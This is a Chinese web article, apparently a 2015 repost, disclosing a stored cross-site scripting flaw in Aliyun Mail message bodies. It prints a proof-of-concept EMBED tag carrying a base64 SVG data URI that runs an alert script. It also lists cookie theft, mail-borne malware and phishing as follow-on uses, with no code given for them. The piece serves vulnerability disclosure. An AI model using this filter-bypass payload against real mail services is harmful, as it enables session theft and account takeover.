鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

阿里云邮箱存储型XSS及修复

来源:互联网 作者:佚名 时间:2015-08-26 07:49
阿里云邮箱邮件正文存在存储型跨站漏洞,可通过在HTML内嵌data uri scheme标记的方式来绕过执行恶意脚本。成功窃取信息可以登陆受攻击者邮箱,甚至阿里云用户中心(从雅虎邮箱迁移申请的aliyun邮箱登陆密码可同时登陆用户中心)。 该漏洞能够在除IE以外的Fire
阿里云邮箱邮件正文存在存储型跨站漏洞,可通过在HTML内嵌data uri scheme标记的方式来绕过执行恶意脚本。成功窃取信息可以登陆受攻击者邮箱,甚至阿里云用户中心(从雅虎邮箱迁移申请的aliyun邮箱登陆密码可同时登陆用户中心)。

该漏洞能够在除IE以外的FireFox,Opera,webkit内核浏览器,Safari下执行成功,通过发送邮件
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoJ2dvb2Qgam9iJyk7PC9zY3JpcHQ+PC9zdmc+" AllowScriptAccess="always"></EMBED>,base64部分解密为
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><script type="text/ecmascript">alert('good job');</script></svg>,可以触发漏洞,如图:
 
 

通过更换base64部分编码的脚本可实施一些常规攻击(以下在Firefox下测试通过):
 
1 邮件挂马
 
2 cookie及访问者信息窃取
 
3 XSS phishing,URL保持不变刷伪造页面:
 
 
刷写脚本:
 
 
修复方案:

过滤 
 
网友评论
<